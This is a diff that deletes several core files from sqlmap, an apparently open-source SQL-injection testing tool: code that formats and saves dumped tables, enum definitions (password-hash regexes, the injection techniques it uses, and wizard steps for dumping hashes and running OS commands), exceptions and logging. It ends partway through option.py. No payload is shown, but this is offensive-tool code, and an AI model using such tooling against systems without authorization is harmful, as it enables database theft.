- lines1 = "-" * (maxlength1 + 2) - - if colType is not None: - maxlength2 = max(maxlength2, len("TYPE")) - lines2 = "-" * (maxlength2 + 2) - - self._write("Database: %s\nTable: %s" % (unsafeSQLIdentificatorNaming(db) if db else "Current database", unsafeSQLIdentificatorNaming(table))) - - if len(columns) == 1: - self._write("[1 column]") - else: - self._write("[%d columns]" % len(columns)) - - if colType is not None: - self._write("+%s+%s+" % (lines1, lines2)) - else: - self._write("+%s+" % lines1) - - blank1 = " " * (maxlength1 - len("COLUMN")) - - if colType is not None: - blank2 = " " * (maxlength2 - len("TYPE")) - - if colType is not None: - self._write("| Column%s | Type%s |" % (blank1, blank2)) - self._write("+%s+%s+" % (lines1, lines2)) - else: - self._write("| Column%s |" % blank1) - self._write("+%s+" % lines1) - - for column in colList: - colType = columns[column] - - column = unsafeSQLIdentificatorNaming(column) - blank1 = " " * (maxlength1 - len(column)) - - if colType is not None: - blank2 = " " * (maxlength2 - len(colType)) - self._write("| %s%s | %s%s |" % (column, blank1, colType, blank2)) - else: - self._write("| %s%s |" % (column, blank1)) - - if colType is not None: - self._write("+%s+%s+\n" % (lines1, lines2)) - else: - self._write("+%s+\n" % lines1) - - def dbTablesCount(self, dbTables): - if isinstance(dbTables, dict) and len(dbTables) > 0: - if hasattr(conf, "api"): - self._write(dbTables, content_type=CONTENT_TYPE.COUNT) - return - - maxlength1 = len("Table") - maxlength2 = len("Entries") - - for ctables in dbTables.values(): - for tables in ctables.values(): - for table in tables: - maxlength1 = max(maxlength1, len(normalizeUnicode(table) or unicode(table))) - - for db, counts in dbTables.items(): - self._write("Database: %s" % unsafeSQLIdentificatorNaming(db) if db else "Current database") - - lines1 = "-" * (maxlength1 + 2) - blank1 = " " * (maxlength1 - len("Table")) - lines2 = "-" * (maxlength2 + 2) - blank2 = " " * (maxlength2 - len("Entries")) - - self._write("+%s+%s+" % (lines1, lines2)) - self._write("| Table%s | Entries%s |" % (blank1, blank2)) - self._write("+%s+%s+" % (lines1, lines2)) - - sortedCounts = counts.keys() - sortedCounts.sort(reverse=True) - - for count in sortedCounts: - tables = counts[count] - - if count is None: - count = "Unknown" - - tables.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x) - - for table in tables: - blank1 = " " * (maxlength1 - len(normalizeUnicode(table) or unicode(table))) - blank2 = " " * (maxlength2 - len(str(count))) - self._write("| %s%s | %d%s |" % (table, blank1, count, blank2)) - - self._write("+%s+%s+\n" % (lines1, lines2)) - else: - logger.error("unable to retrieve the number of entries for any table") - - def dbTableValues(self, tableValues): - replication = None - rtable = None - dumpFP = None - appendToFile = False - warnFile = False - - if tableValues is None: - return - - db = tableValues["__infos__"]["db"] - if not db: - db = "All" - table = tableValues["__infos__"]["table"] - - if hasattr(conf, "api"): - self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE) - return - - dumpDbPath = os.path.join(conf.dumpPath, unsafeSQLIdentificatorNaming(db)) - - if conf.dumpFormat == DUMP_FORMAT.SQLITE: - replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db))) - elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML): - if not os.path.isdir(dumpDbPath): - try: - os.makedirs(dumpDbPath, 0755) - except: - warnFile = True - - _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db))) - dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(unicodeencode(db)).hexdigest()[:8])) - - if not os.path.isdir(dumpDbPath): - try: - os.makedirs(dumpDbPath, 0755) - except Exception, ex: - try: - tempDir = tempfile.mkdtemp(prefix="sqlmapdb") - except IOError, _: - errMsg = "unable to write to the temporary directory ('%s'). " % _ - errMsg += "Please make sure that your disk is not full and " - errMsg += "that you have sufficient write permissions to " - errMsg += "create temporary files and/or directories" - raise SqlmapSystemException(errMsg) - - warnMsg = "unable to create dump directory " - warnMsg += "'%s' (%s). " % (dumpDbPath, getSafeExString(ex)) - warnMsg += "Using temporary directory '%s' instead" % tempDir - logger.warn(warnMsg) - - dumpDbPath = tempDir - - dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower())) - if not os.path.isfile(dumpFileName): - try: - openFile(dumpFileName, "w+b").close() - except SqlmapSystemException: - raise - except: - warnFile = True - - _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(table))) - if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES: - _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(table))) - dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower())) - else: - dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower())) - - appendToFile = os.path.isfile(dumpFileName) and any((conf.limitStart, conf.limitStop)) - dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab", buffering=DUMP_FILE_BUFFER_SIZE) - - count = int(tableValues["__infos__"]["count"]) - separator = str() - field = 1 - fields = len(tableValues) - 1 - - columns = prioritySortColumns(tableValues.keys()) - - if conf.col: - cols = conf.col.split(',') - columns = sorted(columns, key=lambda _: cols.index(_) if _ in cols else 0) - - for column in columns: - if column != "__infos__": - info = tableValues[column] - lines = "-" * (int(info["length"]) + 2) - separator += "+%s" % lines - - separator += "+" - self._write("Database: %s\nTable: %s" % (unsafeSQLIdentificatorNaming(db) if db else "Current database", unsafeSQLIdentificatorNaming(table))) - - if conf.dumpFormat == DUMP_FORMAT.SQLITE: - cols = [] - - for column in columns: - if column != "__infos__": - colType = Replication.INTEGER - - for value in tableValues[column]['values']: - try: - if not value or value == " ": # NULL - continue - - int(value) - except ValueError: - colType = None - break - - if colType is None: - colType = Replication.REAL - - for value in tableValues[column]['values']: - try: - if not value or value == " ": # NULL - continue - - float(value) - except ValueError: - colType = None - break - - cols.append((unsafeSQLIdentificatorNaming(column), colType if colType else Replication.TEXT)) - - rtable = replication.createTable(table, cols) - elif conf.dumpFormat == DUMP_FORMAT.HTML: - dataToDumpFile(dumpFP, "\n\n\n") - dataToDumpFile(dumpFP, "\n" % UNICODE_ENCODING) - dataToDumpFile(dumpFP, "%s\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table))) - dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE) - dataToDumpFile(dumpFP, "\n\n\n\n\n\n") - - if count == 1: - self._write("[1 entry]") - else: - self._write("[%d entries]" % count) - - self._write(separator) - - for column in columns: - if column != "__infos__": - info = tableValues[column] - - column = unsafeSQLIdentificatorNaming(column) - maxlength = int(info["length"]) - blank = " " * (maxlength - len(column)) - - self._write("| %s%s" % (column, blank), newline=False) - - if not appendToFile: - if conf.dumpFormat == DUMP_FORMAT.CSV: - if field == fields: - dataToDumpFile(dumpFP, "%s" % safeCSValue(column)) - else: - dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(column), conf.csvDel)) - elif conf.dumpFormat == DUMP_FORMAT.HTML: - dataToDumpFile(dumpFP, "" % cgi.escape(column).encode("ascii", "xmlcharrefreplace")) - - field += 1 - - if conf.dumpFormat == DUMP_FORMAT.HTML: - dataToDumpFile(dumpFP, "\n\n\n\n") - - self._write("|\n%s" % separator) - - if conf.dumpFormat == DUMP_FORMAT.CSV: - dataToDumpFile(dumpFP, "\n" if not appendToFile else "") - - elif conf.dumpFormat == DUMP_FORMAT.SQLITE: - rtable.beginTransaction() - - if count > TRIM_STDOUT_DUMP_SIZE: - warnMsg = "console output will be trimmed to " - warnMsg += "last %d rows due to " % TRIM_STDOUT_DUMP_SIZE - warnMsg += "large table size" - logger.warning(warnMsg) - - for i in xrange(count): - console = (i >= count - TRIM_STDOUT_DUMP_SIZE) - field = 1 - values = [] - - if conf.dumpFormat == DUMP_FORMAT.HTML: - dataToDumpFile(dumpFP, "") - - for column in columns: - if column != "__infos__": - info = tableValues[column] - - if len(info["values"]) <= i: - continue - - if info["values"][i] is None: - value = u'' - else: - value = getUnicode(info["values"][i]) - value = DUMP_REPLACEMENTS.get(value, value) - - values.append(value) - maxlength = int(info["length"]) - blank = " " * (maxlength - len(value)) - self._write("| %s%s" % (value, blank), newline=False, console=console) - - if len(value) > MIN_BINARY_DISK_DUMP_SIZE and r'\x' in value: - try: - mimetype = magic.from_buffer(value, mime=True) - if any(mimetype.startswith(_) for _ in ("application", "image")): - if not os.path.isdir(dumpDbPath): - os.makedirs(dumpDbPath, 0755) - - _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(column))) - filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (_, randomInt(8))) - warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath) - logger.warn(warnMsg) - - with open(filepath, "wb") as f: - _ = safechardecode(value, True) - f.write(_) - except magic.MagicException, err: - logger.debug(str(err)) - - if conf.dumpFormat == DUMP_FORMAT.CSV: - if field == fields: - dataToDumpFile(dumpFP, "%s" % safeCSValue(value)) - else: - dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(value), conf.csvDel)) - elif conf.dumpFormat == DUMP_FORMAT.HTML: - dataToDumpFile(dumpFP, "" % cgi.escape(value).encode("ascii", "xmlcharrefreplace")) - - field += 1 - - if conf.dumpFormat == DUMP_FORMAT.SQLITE: - try: - rtable.insert(values) - except SqlmapValueException: - pass - elif conf.dumpFormat == DUMP_FORMAT.CSV: - dataToDumpFile(dumpFP, "\n") - elif conf.dumpFormat == DUMP_FORMAT.HTML: - dataToDumpFile(dumpFP, "\n") - - self._write("|", console=console) - - self._write("%s\n" % separator) - - if conf.dumpFormat == DUMP_FORMAT.SQLITE: - rtable.endTransaction() - logger.info("table '%s.%s' dumped to sqlite3 database '%s'" % (db, table, replication.dbpath)) - - elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML): - if conf.dumpFormat == DUMP_FORMAT.HTML: - dataToDumpFile(dumpFP, "\n
%s
%s
\n\n") - else: - dataToDumpFile(dumpFP, "\n") - dumpFP.close() - - msg = "table '%s.%s' dumped to %s file '%s'" % (db, table, conf.dumpFormat, dumpFileName) - if not warnFile: - logger.info(msg) - else: - logger.warn(msg) - - def dbColumns(self, dbColumnsDict, colConsider, dbs): - if hasattr(conf, "api"): - self._write(dbColumnsDict, content_type=CONTENT_TYPE.COLUMNS) - return - - for column in dbColumnsDict.keys(): - if colConsider == "1": - colConsiderStr = "s LIKE '%s' were" % unsafeSQLIdentificatorNaming(column) - else: - colConsiderStr = " '%s' was" % unsafeSQLIdentificatorNaming(column) - - msg = "column%s found in the " % colConsiderStr - msg += "following databases:" - self._write(msg) - - _ = {} - - for db, tblData in dbs.items(): - for tbl, colData in tblData.items(): - for col, dataType in colData.items(): - if column.lower() in col.lower(): - if db in _: - if tbl in _[db]: - _[db][tbl][col] = dataType - else: - _[db][tbl] = {col: dataType} - else: - _[db] = {} - _[db][tbl] = {col: dataType} - - continue - - self.dbTableColumns(_) - - def query(self, query, queryRes): - self.string(query, queryRes, content_type=CONTENT_TYPE.SQL_QUERY) - - def rFile(self, fileData): - self.lister("files saved to", fileData, sort=False, content_type=CONTENT_TYPE.FILE_READ) - - def registerValue(self, registerData): - self.string("Registry key value data", registerData, content_type=CONTENT_TYPE.REG_READ, sort=False) - -# object to manage how to print the retrieved queries output to -# standard output and sessions file -dumper = Dump() diff --git a/lib/core/enums.py b/lib/core/enums.py deleted file mode 100644 index 1bb4fcbb..00000000 --- a/lib/core/enums.py +++ /dev/null @@ -1,353 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -class PRIORITY: - LOWEST = -100 - LOWER = -50 - LOW = -10 - NORMAL = 0 - HIGH = 10 - HIGHER = 50 - HIGHEST = 100 - -class SORT_ORDER: - FIRST = 0 - SECOND = 1 - THIRD = 2 - FOURTH = 3 - FIFTH = 4 - LAST = 100 - -class DBMS: - ACCESS = "Microsoft Access" - DB2 = "IBM DB2" - FIREBIRD = "Firebird" - MAXDB = "SAP MaxDB" - MSSQL = "Microsoft SQL Server" - MYSQL = "MySQL" - ORACLE = "Oracle" - PGSQL = "PostgreSQL" - SQLITE = "SQLite" - SYBASE = "Sybase" - HSQLDB = "HSQLDB" - -class DBMS_DIRECTORY_NAME: - ACCESS = "access" - DB2 = "db2" - FIREBIRD = "firebird" - MAXDB = "maxdb" - MSSQL = "mssqlserver" - MYSQL = "mysql" - ORACLE = "oracle" - PGSQL = "postgresql" - SQLITE = "sqlite" - SYBASE = "sybase" - HSQLDB = "hsqldb" - -class CUSTOM_LOGGING: - PAYLOAD = 9 - TRAFFIC_OUT = 8 - TRAFFIC_IN = 7 - -class OS: - LINUX = "Linux" - WINDOWS = "Windows" - -class PLACE: - GET = "GET" - POST = "POST" - URI = "URI" - COOKIE = "Cookie" - USER_AGENT = "User-Agent" - REFERER = "Referer" - HOST = "Host" - CUSTOM_POST = "(custom) POST" - CUSTOM_HEADER = "(custom) HEADER" - -class POST_HINT: - SOAP = "SOAP" - JSON = "JSON" - JSON_LIKE = "JSON-like" - MULTIPART = "MULTIPART" - XML = "XML (generic)" - ARRAY_LIKE = "Array-like" - -class HTTPMETHOD: - GET = "GET" - POST = "POST" - HEAD = "HEAD" - PUT = "PUT" - DELETE = "DELETE" - TRACE = "TRACE" - OPTIONS = "OPTIONS" - CONNECT = "CONNECT" - PATCH = "PATCH" - -class NULLCONNECTION: - HEAD = "HEAD" - RANGE = "Range" - SKIP_READ = "skip-read" - -class REFLECTIVE_COUNTER: - MISS = "MISS" - HIT = "HIT" - -class CHARSET_TYPE: - BINARY = 1 - DIGITS = 2 - HEXADECIMAL = 3 - ALPHA = 4 - ALPHANUM = 5 - -class HEURISTIC_TEST: - CASTED = 1 - NEGATIVE = 2 - POSITIVE = 3 - -class HASH: - MYSQL = r'(?i)\A\*[0-9a-f]{40}\Z' - MYSQL_OLD = r'(?i)\A(?![0-9]+\Z)[0-9a-f]{16}\Z' - POSTGRES = r'(?i)\Amd5[0-9a-f]{32}\Z' - MSSQL = r'(?i)\A0x0100[0-9a-f]{8}[0-9a-f]{40}\Z' - MSSQL_OLD = r'(?i)\A0x0100[0-9a-f]{8}[0-9a-f]{80}\Z' - MSSQL_NEW = r'(?i)\A0x0200[0-9a-f]{8}[0-9a-f]{128}\Z' - ORACLE = r'(?i)\As:[0-9a-f]{60}\Z' - ORACLE_OLD = r'(?i)\A[01-9a-f]{16}\Z' - MD5_GENERIC = r'(?i)\A[0-9a-f]{32}\Z' - SHA1_GENERIC = r'(?i)\A[0-9a-f]{40}\Z' - SHA224_GENERIC = r'(?i)\A[0-9a-f]{28}\Z' - SHA384_GENERIC = r'(?i)\A[0-9a-f]{48}\Z' - SHA512_GENERIC = r'(?i)\A[0-9a-f]{64}\Z' - CRYPT_GENERIC = r'(?i)\A(?!\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z)(?![0-9]+\Z)[./0-9A-Za-z]{13}\Z' - WORDPRESS = r'(?i)\A\$P\$[./0-9A-Za-z]{31}\Z' - -# Reference: http://www.zytrax.com/tech/web/mobile_ids.html -class MOBILES: - BLACKBERRY = ("BlackBerry 9900", "Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+") - GALAXY = ("Samsung Galaxy S", "Mozilla/5.0 (Linux; U; Android 2.2; en-US; SGH-T959D Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1") - HP = ("HP iPAQ 6365", "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320; HP iPAQ h6300)") - HTC = ("HTC Sensation", "Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30") - IPHONE = ("Apple iPhone 4s", "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B179 Safari/7534.48.3") - NEXUS = ("Google Nexus 7", "Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19") - NOKIA = ("Nokia N97", "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344") - -class PROXY_TYPE: - HTTP = "HTTP" - HTTPS = "HTTPS" - SOCKS4 = "SOCKS4" - SOCKS5 = "SOCKS5" - -class REGISTRY_OPERATION: - READ = "read" - ADD = "add" - DELETE = "delete" - -class DUMP_FORMAT: - CSV = "CSV" - HTML = "HTML" - SQLITE = "SQLITE" - -class HTTP_HEADER: - ACCEPT = "Accept" - ACCEPT_CHARSET = "Accept-Charset" - ACCEPT_ENCODING = "Accept-Encoding" - ACCEPT_LANGUAGE = "Accept-Language" - AUTHORIZATION = "Authorization" - CACHE_CONTROL = "Cache-Control" - CONNECTION = "Connection" - CONTENT_ENCODING = "Content-Encoding" - CONTENT_LENGTH = "Content-Length" - CONTENT_RANGE = "Content-Range" - CONTENT_TYPE = "Content-Type" - COOKIE = "Cookie" - EXPIRES = "Expires" - HOST = "Host" - IF_MODIFIED_SINCE = "If-Modified-Since" - LAST_MODIFIED = "Last-Modified" - LOCATION = "Location" - PRAGMA = "Pragma" - PROXY_AUTHORIZATION = "Proxy-Authorization" - PROXY_CONNECTION = "Proxy-Connection" - RANGE = "Range" - REFERER = "Referer" - SERVER = "Server" - SET_COOKIE = "Set-Cookie" - TRANSFER_ENCODING = "Transfer-Encoding" - URI = "URI" - USER_AGENT = "User-Agent" - VIA = "Via" - X_POWERED_BY = "X-Powered-By" - -class EXPECTED: - BOOL = "bool" - INT = "int" - -class OPTION_TYPE: - BOOLEAN = "boolean" - INTEGER = "integer" - FLOAT = "float" - STRING = "string" - -class HASHDB_KEYS: - DBMS = "DBMS" - CHECK_WAF_RESULT = "CHECK_WAF_RESULT" - CONF_TMP_PATH = "CONF_TMP_PATH" - KB_ABS_FILE_PATHS = "KB_ABS_FILE_PATHS" - KB_BRUTE_COLUMNS = "KB_BRUTE_COLUMNS" - KB_BRUTE_TABLES = "KB_BRUTE_TABLES" - KB_CHARS = "KB_CHARS" - KB_DYNAMIC_MARKINGS = "KB_DYNAMIC_MARKINGS" - KB_INJECTIONS = "KB_INJECTIONS" - KB_ERROR_CHUNK_LENGTH = "KB_ERROR_CHUNK_LENGTH" - KB_XP_CMDSHELL_AVAILABLE = "KB_XP_CMDSHELL_AVAILABLE" - OS = "OS" - -class REDIRECTION: - YES = "Y" - NO = "N" - -class PAYLOAD: - SQLINJECTION = { - 1: "boolean-based blind", - 2: "error-based", - 3: "inline query", - 4: "stacked queries", - 5: "AND/OR time-based blind", - 6: "UNION query", - } - - PARAMETER = { - 1: "Unescaped numeric", - 2: "Single quoted string", - 3: "LIKE single quoted string", - 4: "Double quoted string", - 5: "LIKE double quoted string", - } - - RISK = { - 0: "No risk", - 1: "Low risk", - 2: "Medium risk", - 3: "High risk", - } - - CLAUSE = { - 0: "Always", - 1: "WHERE", - 2: "GROUP BY", - 3: "ORDER BY", - 4: "LIMIT", - 5: "OFFSET", - 6: "TOP", - 7: "Table name", - 8: "Column name", - } - - class METHOD: - COMPARISON = "comparison" - GREP = "grep" - TIME = "time" - UNION = "union" - - class TECHNIQUE: - BOOLEAN = 1 - ERROR = 2 - QUERY = 3 - STACKED = 4 - TIME = 5 - UNION = 6 - - class WHERE: - ORIGINAL = 1 - NEGATIVE = 2 - REPLACE = 3 - -class WIZARD: - BASIC = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba") - INTERMEDIATE = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba", "getUsers", "getDbs", "getTables", "getSchema", "excludeSysDbs") - ALL = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba", "getHostname", "getUsers", "getPasswordHashes", "getPrivileges", "getRoles", "dumpAll") - -class ADJUST_TIME_DELAY: - DISABLE = -1 - NO = 0 - YES = 1 - -class WEB_API: - PHP = "php" - ASP = "asp" - ASPX = "aspx" - JSP = "jsp" - -class CONTENT_TYPE: - TECHNIQUES = 0 - DBMS_FINGERPRINT = 1 - BANNER = 2 - CURRENT_USER = 3 - CURRENT_DB = 4 - HOSTNAME = 5 - IS_DBA = 6 - USERS = 7 - PASSWORDS = 8 - PRIVILEGES = 9 - ROLES = 10 - DBS = 11 - TABLES = 12 - COLUMNS = 13 - SCHEMA = 14 - COUNT = 15 - DUMP_TABLE = 16 - SEARCH = 17 - SQL_QUERY = 18 - COMMON_TABLES = 19 - COMMON_COLUMNS = 20 - FILE_READ = 21 - FILE_WRITE = 22 - OS_CMD = 23 - REG_READ = 24 - -PART_RUN_CONTENT_TYPES = { - "checkDbms": CONTENT_TYPE.TECHNIQUES, - "getFingerprint": CONTENT_TYPE.DBMS_FINGERPRINT, - "getBanner": CONTENT_TYPE.BANNER, - "getCurrentUser": CONTENT_TYPE.CURRENT_USER, - "getCurrentDb": CONTENT_TYPE.CURRENT_DB, - "getHostname": CONTENT_TYPE.HOSTNAME, - "isDba": CONTENT_TYPE.IS_DBA, - "getUsers": CONTENT_TYPE.USERS, - "getPasswordHashes": CONTENT_TYPE.PASSWORDS, - "getPrivileges": CONTENT_TYPE.PRIVILEGES, - "getRoles": CONTENT_TYPE.ROLES, - "getDbs": CONTENT_TYPE.DBS, - "getTables": CONTENT_TYPE.TABLES, - "getColumns": CONTENT_TYPE.COLUMNS, - "getSchema": CONTENT_TYPE.SCHEMA, - "getCount": CONTENT_TYPE.COUNT, - "dumpTable": CONTENT_TYPE.DUMP_TABLE, - "search": CONTENT_TYPE.SEARCH, - "sqlQuery": CONTENT_TYPE.SQL_QUERY, - "tableExists": CONTENT_TYPE.COMMON_TABLES, - "columnExists": CONTENT_TYPE.COMMON_COLUMNS, - "readFile": CONTENT_TYPE.FILE_READ, - "writeFile": CONTENT_TYPE.FILE_WRITE, - "osCmd": CONTENT_TYPE.OS_CMD, - "regRead": CONTENT_TYPE.REG_READ -} - -class CONTENT_STATUS: - IN_PROGRESS = 0 - COMPLETE = 1 - -class AUTH_TYPE: - BASIC = "basic" - DIGEST = "digest" - NTLM = "ntlm" - PKI = "pki" - -class AUTOCOMPLETE_TYPE: - SQL = 0 - OS = 1 - SQLMAP = 2 diff --git a/lib/core/exception.py b/lib/core/exception.py deleted file mode 100644 index 2b09271c..00000000 --- a/lib/core/exception.py +++ /dev/null @@ -1,75 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -class SqlmapBaseException(Exception): - pass - -class SqlmapCompressionException(SqlmapBaseException): - pass - -class SqlmapConnectionException(SqlmapBaseException): - pass - -class SqlmapDataException(SqlmapBaseException): - pass - -class SqlmapFilePathException(SqlmapBaseException): - pass - -class SqlmapGenericException(SqlmapBaseException): - pass - -class SqlmapInstallationException(SqlmapBaseException): - pass - -class SqlmapMissingDependence(SqlmapBaseException): - pass - -class SqlmapMissingMandatoryOptionException(SqlmapBaseException): - pass - -class SqlmapMissingPrivileges(SqlmapBaseException): - pass - -class SqlmapNoneDataException(SqlmapBaseException): - pass - -class SqlmapNotVulnerableException(SqlmapBaseException): - pass - -class SqlmapSilentQuitException(SqlmapBaseException): - pass - -class SqlmapUserQuitException(SqlmapBaseException): - pass - -class SqlmapShellQuitException(SqlmapBaseException): - pass - -class SqlmapSyntaxException(SqlmapBaseException): - pass - -class SqlmapSystemException(SqlmapBaseException): - pass - -class SqlmapThreadException(SqlmapBaseException): - pass - -class SqlmapTokenException(SqlmapBaseException): - pass - -class SqlmapUndefinedMethod(SqlmapBaseException): - pass - -class SqlmapUnsupportedDBMSException(SqlmapBaseException): - pass - -class SqlmapUnsupportedFeatureException(SqlmapBaseException): - pass - -class SqlmapValueException(SqlmapBaseException): - pass diff --git a/lib/core/log.py b/lib/core/log.py deleted file mode 100644 index 55386e04..00000000 --- a/lib/core/log.py +++ /dev/null @@ -1,44 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import logging -import sys - -from lib.core.enums import CUSTOM_LOGGING - -logging.addLevelName(CUSTOM_LOGGING.PAYLOAD, "PAYLOAD") -logging.addLevelName(CUSTOM_LOGGING.TRAFFIC_OUT, "TRAFFIC OUT") -logging.addLevelName(CUSTOM_LOGGING.TRAFFIC_IN, "TRAFFIC IN") - -LOGGER = logging.getLogger("sqlmapLog") - -LOGGER_HANDLER = None -try: - from thirdparty.ansistrm.ansistrm import ColorizingStreamHandler - - disableColor = False - - for argument in sys.argv: - if "disable-col" in argument: - disableColor = True - break - - if disableColor: - LOGGER_HANDLER = logging.StreamHandler(sys.stdout) - else: - LOGGER_HANDLER = ColorizingStreamHandler(sys.stdout) - LOGGER_HANDLER.level_map[logging.getLevelName("PAYLOAD")] = (None, "cyan", False) - LOGGER_HANDLER.level_map[logging.getLevelName("TRAFFIC OUT")] = (None, "magenta", False) - LOGGER_HANDLER.level_map[logging.getLevelName("TRAFFIC IN")] = ("magenta", None, False) -except ImportError: - LOGGER_HANDLER = logging.StreamHandler(sys.stdout) - -FORMATTER = logging.Formatter("\r[%(asctime)s] [%(levelname)s] %(message)s", "%H:%M:%S") - -LOGGER_HANDLER.setFormatter(FORMATTER) -LOGGER.addHandler(LOGGER_HANDLER) -LOGGER.setLevel(logging.INFO) diff --git a/lib/core/option.py b/lib/core/option.py deleted file mode 100644 index ad3b590f..00000000 --- a/lib/core/option.py +++ /dev/null @@ -1,2605 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import cookielib -import glob -import inspect -import logging -import httplib -import os -import random -import re -import socket -import string -import sys -import tempfile -import threading -import time -import urllib2 -import urlparse - -import lib.controller.checks -import lib.core.common -import lib.core.threads -import lib.core.convert -import lib.request.connect -import lib.utils.search - -from lib.controller.checks import checkConnection -from lib.core.common import Backend -from lib.core.common import boldifyMessage -from lib.core.common import checkFile -from lib.core.common import dataToStdout -from lib.core.common import getPublicTypeMembers -from lib.core.common import getSafeExString -from lib.core.common import extractRegexResult -from lib.core.common import filterStringValue -from lib.core.common import findPageForms -from lib.core.common import getConsoleWidth -from lib.core.common import getFileItems -from lib.core.common import getFileType -from lib.core.common import getUnicode -from lib.core.common import isListLike -from lib.core.common import normalizePath -from lib.core.common import ntToPosixSlashes -from lib.core.common import openFile -from lib.core.common import parseTargetDirect -from lib.core.common import parseTargetUrl -from lib.core.common import paths -from lib.core.common import randomStr -from lib.core.common import readCachedFileContent -from lib.core.common import readInput -from lib.core.common import resetCookieJar -from lib.core.common import runningAsAdmin -from lib.core.common import safeExpandUser -from lib.core.common import setOptimize -from lib.core.common import setPaths -from lib.core.common import singleTimeWarnMessage -from lib.core.common import UnicodeRawConfigParser -from lib.core.common import urldecode -from lib.core.convert import base64unpickle -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import mergedOptions -from lib.core.data import queries -from lib.core.datatype import AttribDict -from lib.core.datatype import InjectionDict -from lib.core.defaults import defaults -from lib.core.dicts import DBMS_DICT -from lib.core.dicts import DUMP_REPLACEMENTS -from lib.core.enums import ADJUST_TIME_DELAY -from lib.core.enums import AUTH_TYPE -from lib.core.enums import CUSTOM_LOGGING -from lib.core.enums import DUMP_FORMAT -from lib.core.enums import HTTP_HEADER -from lib.core.enums import HTTPMETHOD -from lib.core.enums import MOBILES -from lib.core.enums import OPTION_TYPE -from lib.core.enums import PAYLOAD -from lib.core.enums import PRIORITY -from lib.core.enums import PROXY_TYPE -from lib.core.enums import REFLECTIVE_COUNTER -from lib.core.enums import WIZARD -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapFilePathException -from lib.core.exception import SqlmapGenericException -from lib.core.exception import SqlmapInstallationException -from lib.core.exception import SqlmapMissingDependence -from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.exception import SqlmapMissingPrivileges -from lib.core.exception import SqlmapNoneDataException -from lib.core.exception import SqlmapSilentQuitException -from lib.core.exception import SqlmapSyntaxException -from lib.core.exception import SqlmapSystemException -from lib.core.exception import SqlmapUnsupportedDBMSException -from lib.core.exception import SqlmapUserQuitException -from lib.core.log import FORMATTER -from lib.core.optiondict import optDict -from lib.core.settings import BURP_REQUEST_REGEX -from lib.core.settings import BURP_XML_HISTORY_REGEX -from lib.core.settings import CODECS_LIST_PAGE -from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS -from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR -from lib.core.settings import DBMS_ALIASES -from lib.core.settings import DEFAULT_PAGE_ENCODING -from lib.core.settings import DEFAULT_TOR_HTTP_PORTS -from lib.core.settings import DEFAULT_TOR_SOCKS_PORT -from lib.core.settings import DUMMY_URL -from lib.core.settings import IGNORE_SAVE_OPTIONS -from lib.core.settings import INJECT_HERE_MARK -from lib.core.settings import IS_WIN -from lib.core.settings import KB_CHARS_BOUNDARY_CHAR -from lib.core.settings import KB_CHARS_LOW_FREQUENCY_ALPHABET -from lib.core.settings import 